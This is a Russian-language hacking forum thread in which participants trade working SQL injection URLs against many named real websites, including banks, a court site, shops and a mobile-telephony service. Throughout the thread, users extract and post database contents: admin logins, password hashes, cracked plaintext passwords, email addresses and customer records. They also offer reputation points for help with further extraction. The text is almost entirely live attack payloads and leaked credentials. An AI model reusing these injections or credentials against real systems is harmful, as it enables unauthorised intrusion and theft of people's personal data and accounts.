В связи с возросшим интересом к данной теме и появлению здесь огромного колличества боянов, за которые выставляються такие же положительные оценки как и за оригинал, я решил погонять тему и создать примитивный антибоянчик. Мера конечно запоздавшая но все-таки!
Просто проверяйте свои скули по собранному мной листу.
http://hlamidnik.h18.ru/SQLS.html

Система до безобразия проста, пока обработано только 27 страниц но до среды соберу там все.
З.Ы Имхо за боян надо выставлять неудовлетворительные оценки.
З.Ы.Ы Выделить бы какнить этот пост)
А лучше бы сделал так:
http://site.com
Ниже сайта ссылка на скуль маленьким шрифтом
И вообще какой-нибудь скрипт на пхп+мускл....

Т.к. за 194 тстраницы скулей очень много не рабочих =)

Никаких извращений не будет, после того как переберу всю тему, поставлю поисковый скрипт- там и будем чекать

Зачем вы тратите свои время и усилия? Прежде чем просто постить в тему надо на гугле делать проверку типа

antichat somehost.com

иногда прокатывает только

antichat somehost

А тем кто постит бояны минус ставить. И всё. В правила темы внести это предупреждение

www.stroyzona.com
http://www.stroyzona.com/warelist.php3?id=-1800+union+select+1,concat(version(),char(58,58),d atabase(),char(58,58),user()),3/*

www.rocit.ru
http://www.rocit.ru/news/shownews.php3?id=-30598+union+select+1,2,3,4,5,6,7,concat(version(), char(58,58),database(),char(58,58),user()),9,10/*

http://coce.samhsa.gov/cod_resources/index.aspx?obj=42+or+1=@@version--


Можно покавырять, но мне не хочиться!
me/ боиться!

В процесе поиска:
http://www.terjemar.net/dict5.php?baseid=-928+union+select+1,2,3/*
для тех у кого много трафа!

http://director-online.com/buildArticle.php?id=-2+union+select+1,2,3,4,5,6,7,8+from+user/*

http://director-online.com/buildArticle.php?id=-2+union+select+1,2,3,4,5,6,7,8+from+user/*


Хочу добавить по Этому Сайтику....

Нашёл ещё 1 табличку: phorum_users
Запрос

director-online.com/buildArticle.php?
POST: id=-2+UNION+SELECT+1,2,3,4,5,concat(username,char(58), password),7,8+FROM+phorum_users/*


=========
Для id=1
username: !aaf
hash: 1b207465eac83b5d4b12e335faa0b53a
crackHash: paula

========


Также Колонки для этой таблички

id
name
username
password
emai
webpage
image
icq
aol
yahoo
msn
jabber
signature
hide_email
permission_level
max_group_permission_level
lang
password_tmp

один из кинотеатров Питера =)
kolizey.spb.ru
http://www.kolizey.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,concat(login,0x3a,password,0x3a,email),18+from +user/*&lang=eng
юзер:пасс:мыло

там еще есть таблица 'guestbook', колонка вроде 'email', но я не уверен, копаться не стал.

www.efimov-partners.ru
http://www.efimov-partners.ru/vacancy/?rubric=-47+union+select+concat(version(),char(58,58),datab ase(),char(58,58),user())/*

www.santechmart.ru
http://www.santechmart.ru/print.php?id=-1+union+select+concat(version(),char(58,58),databa se(),char(58,58),user())/*

www.yurclub.ru
http://www.yurclub.ru/catalog/geo.list.php?s=-11000+union+select+1,concat(version(),char(58,58), database(),char(58,58),user())/*&r=0&PHPSESSID=d974a3bb28fedf99bf678190478bb00b


www.ladofon.ru
http://www.ladofon.ru/news_detail.php?news_id=-69+union+select+1,2,3,concat(version(),char(58,58) ,database(),char(58,58),user()),5,6,7,8/*

http://www.staldveri.ru
http://www.staldveri.ru/products/popup.php?id=-2+union+select+1,concat(version(),char(58,58),data base(),char(58,58),user()),3,4,5,6,7/*

www.spbgid.ru
http://www.spbgid.ru/index.php?type=-1+union+select+1,convert(concat(version(),char(58, 58),database(),char(58,58),user())%20using%20cp125 1),3/*

Достали в игрушки играть давайте.

http://quest.mini-rinok.ru/index.php?id=1
http://quest.mini-rinok.ru/index.php?id=2
http://quest.mini-rinok.ru/index.php?id=2-1

Кто составит корректный запрос +20 от меня.

http://www.prokredo.ru/collegefaculty.php?id=50%20union%20select%201,conc at(login,char(58),password),3,4,5,6,7,8,9,10,11,12 ,13,14%20FROM%20kredo_admins/*
-------------------------------
sql password
mooncat login
------------------------------
TABLES:

CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, TABLES,
TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES,VIEWS, kredo_activity,
kredo_admins, kredo_albums, kredo_article, kredo_college, kredo_company, kredo_contacts, kredo_doc, kredo_faculty, kredo_links, kredo_media, kredo_news, kredo_opinions, kredo_pages, kredo_partner, kredo_photo, kredo_presskit, kredo_publications, kredo_questions, kredo_represents,kredo_sections, kredo_students, kredo_vacancy, prokredo_forum_auth_access, prokredo_forum_banlist, prokredo_forum_categories, prokredo_forum_config, prokredo_forum_confirm, prokredo_forum_disallow, prokredo_forum_forum_prune, prokredo_forum_forums, prokredo_forum_groups, prokredo_forum_posts, prokredo_forum_posts_text, prokredo_forum_privmsgs, prokredo_forum_privmsgs_text, prokredo_forum_ranks, prokredo_forum_search_results, prokredo_forum_search_wordlist, prokredo_forum_search_wordmatch, prokredo_forum_sessions, prokredo_forum_sessions_keys, prokredo_forum_smilies, prokredo_forum_themes, prokredo_forum_themes_name, prokredo_forum_topics, prokredo_forum_topics_watch, prokredo_forum_user_group, prokredo_forum_users, prokredo_forum_vote_desc, prokredo_forum_vote_results, prokredo_forum_vote_voters, prokredo_forum_words
---------------
COLUMNS:
CHARACTER_SET_NAME, DEFAULT_COLLATE_NAME, DESCRIPTION, MAXLEN, COLLATION_NAME
http://quest.mini-rinok.ru/index.php?id=1
cash, а ты уверен что там можно что-то сделать?

Уверен.
)))))))))))))))))))))))))))
Что поставили кавычку нечего не получилось )))

']Достали в игрушки играть давайте.

http://quest.mini-rinok.ru/index.php?id=1
http://quest.mini-rinok.ru/index.php?id=2
http://quest.mini-rinok.ru/index.php?id=2-1

Кто составит корректный запрос +20 от меня.
я её сделал когда там ещё недостаточная фильтрация была),а потом нет.
Мне киборг подскзывал как там делать надо, но я так и не смог((, видимо мало над этим думал, надо будет как нибудь на досуге этим занятся.


http://www.rabotamania.ru/index.php?id=-1+union+select+1111111111/*

несмог таблицы подобрать.
префикс rabotamania_

^^куда уж нам до "гуру"^^
http://cmj.com/charts.php?chart_type=-21+union+select+1,column_name,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21+from+information_sch ema.columns+where+table_name='users'+limit+6,1

[ cash ], http://quest.mini-rinok.ru/index.php?id=1%0bunion%0bselect%0bversion()/*

держи

ну и я заодно подкину
http://alia.org.au/publishing/incite/2006/06/print.html?ID=68%20union%20select%201,2,3,4,5,6,7, 8,9,10,concat(password,char(58),user),12,13,14,15, 16,17%20from%20mysql.user/*

[ cash ],

держи

смотри там и киборг побывал:

http://quest.mini-rinok.ru/index.php?id=1%0bunion%0bselect%0bconcat(username, char(58),password)%0bfrom%0busers/*

k1b0rg:599745

ВНИМАНИЕ!!

В связи с возросшим интересом к данной теме и появлению здесь огромного колличества боянов, за которые выставляються такие же положительные оценки как и за оригинал, я решил погонять тему и создать примитивный антибоянчик. Мера конечно запоздавшая но все-таки!
Просто проверяйте свои скули по собранному мной листу.
http://hlamidnik.h18.ru/SQLS.html

Система до безобразия проста, пока обработано только 27 страниц но до среды соберу там все.
З.Ы Имхо за боян надо выставлять неудовлетворительные оценки.
З.Ы.Ы Выделить бы какнить этот пост)
хах,типа авторские права на скули? :)

http://www.invest-em.ru/it/lib/article.php?id=-391+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3/*

http://www.lineonline.ws/detail.php?id=14756'+union+select+1, 2/*

http://www.brunet.ws/detail.php?id=6071'+union+select+1, 2/*
сёдня както маловато (

VisionLearning.com
31000 users

http://www.visionlearning.com/library/flash_viewer.php?oid=-1+union+select+1,concat(username,0x3a,password,0x3 a,email),3,4,city+from+users+limit+31000,31001/*


http://kras.ru/pop_news.php?winid=-1+union+select+COLUMN_NAME,2,3,4+from+INFORMATION_ SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(108,101,103,9 7,108)/*
http://ara.com.ua/onenews.php?oid=-1+union+select+1,2,3,user(),5,6,database()/*

какой-то банк! помогите подобрать таблицу
http://www.nskbl.ru/tariff/plans/?id=7&data_id=900-9%20union%20select%201,2,3,4,5,6/*

Ну что, кэш, где твои +20? шутка, можешь не ставить.

хаха еще один банк
http://www.cashservice.ru/index.php?part=transfer&action=point&id=700%20union%20select%20version(),database(),ver sion(),4/*

наслаждаемся rooтом
http://www.747.ru/board/main/show/?id=700%20union%20select%201,2,user,password,5,6,7 ,8,9,10%20from%20mysql.user/*

http://www.luontais.info/luontais.pmd/foorumi/haastattelu?id=-7+union+select+1,2,3,user(),version(),database(),7 ,8/*

Есть таблица users, но не смог вывести из неё колонки =\

Какието услуги по созданию сайтов =\

http://www.media-r.ru/print.php?id_new=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17/*

Бавлинская централизованная библиотечная система

http://www.bavly-cbs.ru/news.php?id_new=-28+union+select+1,concat(user(),char(58),version() ,char(58),database()),3/*

http://www.altaienergo.ru/show_new.php?id_new=-1533+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql. user/*

Кто поможет вывести даные, дам +8 !

http://www.altaienergo.ru/show_new.php?id_new=-1533+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql. user/*

Кто поможет вывести даные, дам +8 !

если правильно понял
http://www.altaienergo.ru/show_new.php?id_new=-1533+union+select+1,2,3,4,concat(password,char(58) ,user),6,7,8,9,10+from+mysql.user+limit+0,1/*
вывод в картинке и в титле

zl0ba, ещё так :)
http://www.altaienergo.ru/show_new.php?id_new=-1533+union+select+1,AES_DECRYPT(AES_ENCRYPT(user,0 x71),0x71),3,AES_DECRYPT(AES_ENCRYPT(password,0x71 ),0x71),5,6,7,8,9,10+from+mysql.user/*

www.tdahp.ru
http://www.tdahp.ru/ru/zayavka/index.html?id_tovar=-2+union+select+concat(version(),char(58,58),databa se(),char(58,58),user()),2/*

www.studygerman.ru
http://www.studygerman.ru/test/test.php?id=-1+union+select+1,2,convert(concat(version(),char(5 8,58),database(),char(58,58),user())+using+cp1251) ,4,5,6,7,8,9/*

www.impactsoft.ru
http://www.impactsoft.ru/eng/clients.php?razdel_id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(ve rsion(),char(58,58),database(),char(58,58),user()) ,0x71),0x71),3,4,5,6/*

www.icie.ru
http://www.icie.ru/press-centre/foto/?id=-4+union+select+concat(version(),char(58,58),databa se(),char(58,58),user())/*

www.sacr.sk
http://www.sacr.sk/category2?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,concat(version (),char(58,58),database(),char(58,58),user()),12,1 3,14,15,16,7,18,19,20,21,22/*&lang=ru


www.chelsi.ru
http://www.chelsi.ru/comment.php?idart=-11364+union+select+1,2,3,4,5,concat(version(),char (58,58),database(),char(58,58),user())/*

www.telme.sg аналог скайпа, только заточен под моб. тел., с сайта можно управлять счётом, переводить деньги можно только на банковский счёт /обманули, писали что можно и на вебмани :mad: /
пользователей 50 тис., перебор через лимит. может комуто и пригодится ;)


http://www1.telme.sg/page1.php?curr=page1&lang=eng&sub=com&subm=2&ses=3969+union+select+1,2,column_name+from+informa tion_schema.columns+where+table_name=0x7573657273+ limit+65,1/*


http://www1.telme.sg/page1.php?curr=page1&lang=eng&sub=com&subm=2&ses=3969+union+select+1,2,concat_ws(char(58),id,ni ckname,webname,firstname,lastname,street,city,stat e,postcode,country,phone,mobile,fax,email,birth_d, birth_m,birth_y,title,upd,pwd,cell_id,presented,fo rced,package,credit,vaucher,datas,fastbonus,pickup ,pickupzone,actadsl,idadsl,adsltime,lastadslcardid ,lastadslcarddate,autologindesk,lang,hiddenstatus, startupautoconf,pars5pos,pars5neg,pars5dist,assist ant,regdate,actdate,boosterc,gparsed,visite,lastlo g,localizzazione,gruppo,abilita,foto,qualifica,tit olo,commissionabile,codicedistributore,idpacchetto ,idattivazione,metodopagamento,nomeadmin,cognomead min,codfiscadmin,viaadmin,cittaadmin,capadmin)+fro m+users+limit+11111,1/*

админку не нашёл, но таблица есть

http://www1.telme.sg/page1.php?curr=page1&lang=eng&sub=com&subm=2&ses=3969+union+select+1,2,concat(username,char(58) ,password)+from+admin+limit+0,1/*

http://pribalt.info/arhiv.php?month=-4+union+select+1,2,3,4,concat(password,char(58)%20 user),6,7,8,9,10+from+mysql.passw,3/*

pribalt.info :rolleyes:

zl0ba,
http://www.media-r.ru/print.php?id_new=-4+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(c oncat(name,0x3a,pass),0x71),0x71),7,8,9,10,11,12,1 3,14,15,16,17+from+t_users+limit+0,1/*

ps там пятая версия мускула :)

Если бы не эта попка прошёл бы мимо :
http://www.nnmed.ru/images/anons/20074313828.jpeg


Вот скуля попки :

http://www.nnmed.ru/new.php?id_new=-99+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17/*

www.fasie.ru

http://www.fasie.ru/index.php?rid=-999+union+select+1,2,concat(version(),char(58,58), database(),char(58,58),user()),4,5/*


P.S. Проверил тут _http://hlamidnik.h18.ru/SQLS.html, имхо не боян :)

[ cash ],

держи
имхо, там не так задумывалось, пробельные символы в идеале должны были фильтроваться

угу я говорил кибу что бы убрал...

http://www.audit-paritet.ru/buh.php?id_new=-1950+union+select+1,2,concat(user(),char(58),VERSI ON()),4,5,6/*

http://www.autoindex.ru/news/index.php?id_news=-4984+union+select+1,2,3,4,5,6,7,8,9,10/*

=)

Подмосоковье.ру =)
http://www.podmoskowie.ru/include/extra_pic.inc.php?pfl_id=-2+union+select+1,2,concat(char(58,58),version(),ch ar(58,58),database(),char(58,58),user(),char(58,58 )),4/*

http://www.teatrdoc.ru/plays.php?id=-5+union+select+version(),2,3,4/*
http://www.kspz.ru/items.phtml?id=-3+union+select+version()/*
http://www.centresh.ru/article.php?id=-5+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x78),0x78),3,4,5,6,7/*
http://foto-oboi.ru/showo.php?id=-3+union+select+1,2,3,4,concat(name,char(58),passwo rd),6,7,8,9,10+from+users+limit+3,1/*

что-то непонятное:
http://www.unccd.int/ngo/accreditationDB/institutionDetails.php?id=1+order+by+29--
2_Pantera_, а фотообои кажись уже были

это sybase ODBC.
Почитай я создавал темы.
А вообще хочешь расковырять тебе на sql.ru
синтаксис как mssql.

http://director-online.com/buildArticle.php?id=311+order+by+8
+
+

http://www.thesop.org/index.php?id=21+order+by+1
+
+
.pl
http://www.mikado.pl/kolowrotek.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21/*/*

www.cybersquads.ru
http://cybersquads.ru/demos/?type=&gametype=&map=&pov=can'+union+select+1,2,3,4,5,version(),7,concat _ws(char(58),login,password),9,10,11+from+users/*

login : pass
Admin login: unlim
Password: qqq1

http://www.celtavigo.net/sections.php?op=viewarticle&artid=-320+union+select+1,2,3,4,5/*
http://www.celtavigo.net/sections.php?op=listarticles&secid=-4+union+select+1,2,3,4,5/*
http://www.celtavigo.net/article.php?sid=-9296++union+select+1,2,3,4,5,6,7,8/*
ничего кроме цифр не получилось :mad:

2 toPoR
http://www.celtavigo.net/article.php?sid=-9296++union+select+1,2,AES_DECRYPT(AES_ENCRYPT(ver sion(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(name,0x 71),0x71),AES_DECRYPT(AES_ENCRYPT(pass,0x71),0x71) ,6,7,8+from+users/*

http://www.foodforfun.ru/self.php?id=-1+union+select+1,2/*

http://www.thesop.org/index.php?id=-1+union+select+1/*

плиз,посматрите инЪеции на http://fogofwar.ru

http://www.otadoya.ru/catalog/more/?cat_id=-8+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x71),0x71)/*&id=1543 таблиц не нашел :( ,рядом форум стоит
http://ibc-web.ru/portfolio/?id=13' ну собственно сам разроботчик сайта тока вывода нет ;)

http://www.scorpion.ru/hard.php?id=-1+union+select+1,2,3/*
ва

а вот и поинтересней http://www.ecotour.ru/viewcountry.php?id=-9+union+select+1,null,concat(user_name,char(58),us er_password),4,5+FROM+photo_users/*вроде админка есть http://www.ecotour.by/robots.txt но хз как в нее попасть также акк подходит к http://37.ecotour.by юзайте ;)
в итоге угнал 3 мыла хоть и не красивые но зато приятно:)

http://www.n.kiev.ua/show_club.php?club=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21/*


http://www.n.kiev.ua/show_club.php?club=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21+from+news/*

нашел только таблицу news . . .
::: Ночной Киев ::: - афиша, диско, клубы, рестораны, знакомства и многое другое

http://www.mnogosearch.org/bugs/bugs.php?id=21+order+by+16
9898

http://scriptmagix.com/index.php?cmd=2&id=-1+union+select+1,concat(username,0x3a,password),3, 4,5,6,7+from+admin+limit+1,1/*
^^

http://www.janetchui.net/picture.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10/*
ss

www.dvdcdtorg.ru
http://www.dvdcdtorg.ru/?pageId=1&catId=-13+union+select+1,2,concat_ws(char(58,58),version( ),database(),user()),4,5,6,7,8/*

www.mfun.ru
http://www.mfun.ru/music/melody/play.php?melodyid=-1+union+select+1,concat_ws(char(58,58),version(),d atabase(),user()),3,4/*

www.notaryclub.ru
Есть таблица : ccforum_users
Колонки не нашел =)
Версия mysql: 5
http://notaryclub.ru/users.php?op=show&uid=-5+union+select+1,2,3,4,concat_ws(char(58,58),versi on(),database(),user()),6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20/*


Верховный суд Российской Федерации

Имеются таблицы:
1)users:
Колонки: нашел только password
2)user:
user : password
http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58),user,pa ssword)+using+cp1251)+from+mysql.user/*
MySQL info
http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58,58),vers ion(),database(),user())+using+cp1251)+from+users/*

To Isis

http://www.supcourt.ru/courts_m.php?b=-1)+union+select+convert(concat_ws(char(58),user,pa ssword)+using+cp1251)+from+mysql.user/*


расшифровывается так:

root:root
axmet:ax

http://www.marumi-filter.ru/shop/?id=74'+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8, 9,10,1, 2/*

http://www.sexshop-romantic.ro/sex-shop/?id=-26+union+select+1,2,3/* - 3 версия(

http://www.bomdiggy.com/readColumn.php?id=-43+union+select+1,2,version(),4,5,6,7,8+from+users/*

К тем кто выкладывает скули с доступом к базе mysql, выводите не только колонки user и password, а ещё и host

http://www.greenshift.com/news.php?id=-134+union+select+1,password,3,4,5,6,7,8,9,10,11,12 %20+from+mysql.user/*

http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-9%20union+select+1,version(),3,4,user(),6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23/*

http://www.almaz-antey.ru/news.php?id=-115+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

Проверка на Антибояне(http://hlamidnik.h18.ru/SQLS.html) показала, что http://www.footballfoundation.com- БОЯН, при этом обработано только 62 страницы =\

ucnb.rutgers.edu

http://ucnb.rutgers.edu/display.php?id=126+order+by+4

http://www.htmlbook.ru/ - для тех, кто делает сайты /заглавие страницы/

http://www.htmlbook.ru/faq/?id=8&a=-41+union+select+1,concat_ws(char(58),version(),dat abase(),user()),3,4,5/* - для тех, кто не только делает сайты :D

http://www.nterra.ru/index.php?lang=eng&path=regards&id=-26+union+select+1,2,3,4,5,6,7,8,9,table_name,11,12 ,13+from+information_schema.tables/*

http://breakdance.ru/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
:cool:

http://www.streetfighters.ru/shop/?id=-33+union+select+1,2,3,4,5,6,7,concat(full_name,0x3 a,phone_number,0x3a,city,0x3a,street_address_b,0x3 a,id,0x3a,email_address,0x3a),9+from+users/*

http://www.nakhodkamedia.ru/news.php?news_id=-563+union+select+1,2,0x3c68313e3c666f6e7420636f6c6 f723d6c696d653e3a3a3a504950455a3a3a3a3c2f666f6e743 e3c2f68313e,4,5/*

Извиняюсь за второй пост!

http://www.ussurimedia.ru/news.php?news_id=-1451+union+select+1,21,2121212,122,1222/*

www.tv-7.com.ua

Какое то ТиВи =)

http://www.tv-7.com.ua/news_next.php?id_news=-1260+union+select+1,2,3,4,5,6,7,8,9,concat(version (),char(58),user()),11,12,13,14,15/*

rere
http://director-online.com/buildArticle.php?id=311+order+by+8

Сайт: http://www.dubinushka.ru/ (Студенческий сайт Физического факультета МГУ)
уязвимость: http://www.dubinushka.ru/photo_podthemes.php?pt_id=10'
подобранные таблицы: users
подобранные поля: login,pass
17 организмов
http://www.dubinushka.ru/photo_podthemes.php?pt_id=10+and+1=0+union+select+ 11,22,login,pass+from+users/*Имеются на сайте:
админка http://www.dubinushka.ru/admin/
В неё можно зайти под любым логином из 17-ти, зная пароль, (пароли md5, несколько сразу находятся в онлайне)
Форум - ipb 2.1.7 - 5k+ организмов.

www.bluetouch.fr

Ты хде же, це блютуч бачишь?


http://www.bluetouch.fr/fr/location/reservation.php?id_base=-16+union+select+concat(user(),char(58),version(),c har(58),database())/*&type_bato=Oc%C3%A9anis%20361&id_bateau=28

www.vetdoctor.ru

http://www.vetdoctor.ru/news/text_reader.php?text_id=-124+union+select+1,2,3,4,5,6,7/*&category_id=24

www.bench-mark.ru

http://www.bench-mark.ru/main.php?text_id=-1294+union+select+1,concat(user(),char(58),version (),char(58),database()),3,4,5/*

www.modernpolitics.at

http://www.modernpolitics.at/text.php?id_text=-105+union+select+1,concat(user(),char(58),version( ),char(58),database())/*

www.zonewm.biz
Не нашел где деньги выводить:(
http://zonewm.biz/showa.php?id=-132+union+select+1,2,3,concat_ws(char(58,58),mail, pass),5,6,7,8+from+user+limit+1,1/*
login : pass
id:1
agpss@rambler.ru
d838d31c16c14b2765fa4c19ff0b9044 = allazar

2Isis уже было), скорей бы антибоян был готов=).

http://neuroshima.elixir.int.pl/infopage.php?id=-1+union+select+count(concat_ws(0x3a,nick,pass,mail )),2+from+elixir_users/*

мава
http://www.heymancenter.org/event_email.php?id=21+order+by+28

_http://midmich.net/news/read.php?id=-1+union+select+111,concat(user(),version(),databas e()),333,444,555/*

Незабываем проверять инжекты на АНТИБОЯНЕ (http://hlamidnik.h18.ru/SQLS.html)
Обработано уже 89 страниц, но одному этим заниматься очень утомительно
Всем желающим помочь в создании антибоянного листа, просьба обращаться в личку, особенная помощь нужна в диапазоне 110-150 страницы.
Кстати Isis- http://www.ladofon.ru- боян и BlackCats тоже набоянил =\

www.unicttaskforce.org
http://www.unicttaskforce.org/perl/documents.pl?id=-1392+order+by+12/*

http://z-tec.ru
http://z-tec.ru/index/catalogue/showitem.php?id=-110+union+select+1/*

www.cityslam.ru
http://www.cityslam.ru/catalog.php?id=-101+union+select+1,2,3,4,5,6,concat_ws(char(58),ve rsion(),database(),user()),8,9,10,11,12,13,14,15,1 6,17,18,19,20/*

www.pec.spb.ru
http://www.pec.spb.ru/dictionary/?id=-218+union+select+1,concat_ws(char(58),name,passwor d,email),3+from+users+limit+8,1/*


www.flugzeugbilder.de
http://www.flugzeugbilder.de/show.php?id=-567978+union+select+1,2,3,4,5,concat_ws(char(58),v ersion(),database(),user()),password,concat(user,c har(58)),9,10,11,12,13,14,15,16,17,18,19,20+from+m ysql.user+limit+4,1/*

root: 3616438873d71bd2
ivax: 652fa1a75d18da89
wx: 68708852333c8a5e
pp: 1b112489580fbed1
air: 2a98610a18cbfe30
всего 4 юзера.Кодировка по мойму MD5

Версия - 4.0.21-Max-log
database - fb
юзер - pp@localhost


www.luftfahrt.net Сайт какойто Авиокампании.
http://www.luftfahrt.net/galerie/showpix.php?id=-21276+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*